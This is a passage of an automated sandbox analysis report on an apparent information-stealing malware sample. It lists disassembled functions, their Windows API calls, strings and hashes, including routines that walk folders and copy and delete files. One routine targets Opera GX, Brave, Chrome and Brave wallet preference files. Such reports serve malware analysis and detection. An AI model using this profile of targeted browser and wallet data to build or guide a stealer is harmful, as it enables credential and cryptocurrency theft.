                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderPathlstrcpy
                                      • String ID:
                                      • API String ID: 1699248803-0
                                      • Opcode ID: 46d068fa4588579770cf0f2b7216b9ecb7885d10b97474dc17bd87029cf158d5
                                      • Instruction ID: f82677ff5156e21ebcf22c1499259986ba886b6a4feadbe72b176c4770674801
                                      • Opcode Fuzzy Hash: 46d068fa4588579770cf0f2b7216b9ecb7885d10b97474dc17bd87029cf158d5
                                      • Instruction Fuzzy Hash: 00F03031A1015CABDB51DA58DC51BADB7FCDB84711F1082A6BA08E72C0DA706F168B94
                                      Function 003013C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • SHFileOperation.SHELL32(?), ref: 003013F6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOperation
                                      • String ID:
                                      • API String ID: 3080627654-0
                                      • Opcode ID: af4d0dae126e7fd695d0fcd27973a356884fbaf16c64f1755c889e4dfd02d9af
                                      • Instruction ID: c7aff520c1ba6c35f76cfcc1e422132e7375ce260291fd99cddc4f98f912288e
                                      • Opcode Fuzzy Hash: af4d0dae126e7fd695d0fcd27973a356884fbaf16c64f1755c889e4dfd02d9af
                                      • Instruction Fuzzy Hash: 7CE0AEB4D0420CAFCB49DFA8D8006EEBBF9EF4C300F00816AE808E7340E77986408B95

                                      Non-executed Functions

                                      Function 00304F80 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 325stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00304FA0
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00304FB7
                                      • memset.MSVCRT ref: 00304FD0
                                      • memset.MSVCRT ref: 00304FE3
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030500F
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305029
                                      • wsprintfA.USER32 ref: 0030504E
                                      • StrCmpCA.SHLWAPI(?,003101E9), ref: 00305060
                                      • wsprintfA.USER32 ref: 00305088
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • wsprintfA.USER32 ref: 003050AA
                                      • memset.MSVCRT ref: 003050C1
                                      • lstrcat.KERNEL32(?,?), ref: 003050D1
                                      • strtok_s.MSVCRT ref: 003050E7
                                      • strtok_s.MSVCRT ref: 00305116
                                      • memset.MSVCRT ref: 00305130
                                      • lstrcat.KERNEL32(?,?), ref: 00305140
                                      • strtok_s.MSVCRT ref: 00305156
                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0030516E
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,02F45090,?,?,?,003101E0,?,00000000,?,003101E9), ref: 0030520F
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305227
                                        • Part of subcall function 00300F90: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00300FAD
                                        • Part of subcall function 00300F90: GetFileSizeEx.KERNEL32(00000000,?), ref: 00300FBF
                                        • Part of subcall function 00300F90: CloseHandle.KERNEL32(00000000), ref: 00300FCA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00305247
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,003101E9), ref: 00305259
                                      • strtok_s.MSVCRT ref: 00305272
                                      • FindNextFileA.KERNEL32(?,?), ref: 00305374
                                      • FindClose.KERNEL32(?), ref: 00305386
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
                                      • String ID: %s\%s$%s\%s\%s$%s\*.*
                                      • API String ID: 3252185717-1853381274
                                      • Opcode ID: 2b609da62d71b6d2a03acfc5dd4afb3d0684fbf59303abb9f2ec91d6a5f477d9
                                      • Instruction ID: 4c44f43a028892934a12df43de063980d12edae946495829d3a6c9ea39920807
                                      • Opcode Fuzzy Hash: 2b609da62d71b6d2a03acfc5dd4afb3d0684fbf59303abb9f2ec91d6a5f477d9
                                      • Instruction Fuzzy Hash: 94C1867291020CABDB65EBA0DC55FFE737CAF54740F044568FA09A6181EB71AA58CFA0
                                      Function 002FC2E0 Relevance: 44.5, APIs: 20, Strings: 5, Instructions: 767fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,003101E9,003101E9,00000000,?,?,?,003134C0,003101E9), ref: 002FC35C
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FC38C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FC3A6
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                      • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FC43F
                                      • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,003101E0,?,02F432B8,?,003101E0,?,02F432D8,00000000,?,?,?,003101E0), ref: 002FC5D6
                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 002FC5F0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC6B4
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FC77B
                                      • StrCmpCA.SHLWAPI(?,02F45360), ref: 002FC7AF
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002FBF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FBFD7
                                        • Part of subcall function 002FBF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC00B
                                        • Part of subcall function 002FC2E0: StrCmpCA.SHLWAPI(?,02F432D8), ref: 002FC813
                                        • Part of subcall function 002FC2E0: StrCmpCA.SHLWAPI(00000000,02F432B8), ref: 002FC82D
                                      • FindNextFileA.KERNEL32(?,?), ref: 002FCD02
                                      • FindClose.KERNEL32(?), ref: 002FCD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                      • API String ID: 480569104-1189830961
                                      • Opcode ID: 349272cd5a08e38f8d9ad5884ef503104bf02a283aafad1d2d526b575fb6e3bc
                                      • Instruction ID: 4a3287257fd81e30cf1602d72893b9f12e80905c0263f0e9216f2316b87ce407
                                      • Opcode Fuzzy Hash: 349272cd5a08e38f8d9ad5884ef503104bf02a283aafad1d2d526b575fb6e3bc
                                      • Instruction Fuzzy Hash: 0952427192010C6BDB59FB70DD56EFEB338AF54780F404578FA0662291EF709A68CEA1
                                      Function 00305EA0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 227stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wsprintfA.USER32 ref: 00305EBC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00305ED3
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 00305EFC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305F16
                                      • wsprintfA.USER32 ref: 00305F3B
                                      • StrCmpCA.SHLWAPI(?,003101E9), ref: 00305F4A
                                      • wsprintfA.USER32 ref: 00305F67
                                      • wsprintfA.USER32 ref: 00305F86
                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 00305F97
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305FC3
                                      • lstrcat.KERNEL32(?,003101E0), ref: 00305FD5
                                      • lstrcat.KERNEL32(?,?), ref: 00305FE3
                                      • lstrcat.KERNEL32(?,003101E0), ref: 00305FF5
                                      • lstrcat.KERNEL32(?,?), ref: 00306009
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003060AA
                                      • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003101E9), ref: 00306119
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(?,?), ref: 00306160
                                      • FindClose.KERNEL32(?), ref: 00306172
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 103870964-2848263008
                                      • Opcode ID: 2fb488212830d558ad53f961ae6e7c5dd7092b9c110b20f1b264c9509e12510a
                                      • Instruction ID: 838bff6991f3689bfab3447710a4916ec6861d72f5f0762a397865717a890737
                                      • Opcode Fuzzy Hash: 2fb488212830d558ad53f961ae6e7c5dd7092b9c110b20f1b264c9509e12510a
                                      • Instruction Fuzzy Hash: 4881C47191020CABDB29EBB0DD99DFEB37CAF54740F044568F506A2191EF30AA59CFA0
                                      Function 00305A70 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 191filestringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00305A82
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00305A89
                                      • wsprintfA.USER32 ref: 00305AA2
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00305AB9
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 00305ADC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305AF6
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305BBC
                                        • Part of subcall function 00302C70: memset.MSVCRT ref: 00302C89
                                        • Part of subcall function 00302C70: memset.MSVCRT ref: 00302C9C
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,00000000), ref: 00302CCC
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,02F45420), ref: 00302CE8
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,?), ref: 00302CFC
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,02F450D8), ref: 00302D10
                                        • Part of subcall function 00302C70: StrStrA.SHLWAPI(00000000,02F45438), ref: 00302DA5
                                      • DeleteFileA.KERNEL32(00000000), ref: 00305BEE
                                      • wsprintfA.USER32 ref: 00305B18
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305C0C
                                      • FindClose.KERNEL32(00000000), ref: 00305C1B
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305C40
                                      • lstrcat.KERNEL32(?,02F45840), ref: 00305C53
                                      • lstrlen.KERNEL32(?), ref: 00305C5D
                                      • lstrlen.KERNEL32(?), ref: 00305C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heapmemsetwsprintf$AllocateCloseCopyDeleteFirstNextProcessSystemTime
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 507455209-2848263008
                                      • Opcode ID: e947b068eb05328702cdf0d37c0aad278927e80cafba8dcddd6a54912cf7cc0a
                                      • Instruction ID: f82f351f11df74c046be11cf47ff46f395692178f44a14e3af067f5b7fda53f2
                                      • Opcode Fuzzy Hash: e947b068eb05328702cdf0d37c0aad278927e80cafba8dcddd6a54912cf7cc0a
                                      • Instruction Fuzzy Hash: B7618171920208ABDB15FBB0DD99EFE733CAF54740F444578F606A2191EB70AA59CF60
                                      Function 002F1110 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 658fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003101E0,?,?,?,003101E0,?,?,00000000,?,00000000), ref: 002F12D9
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F12FC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F1316
                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,?,003101E0,?,?,?,003101E0,?,?,?,003101E0,?,?), ref: 002F140D
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
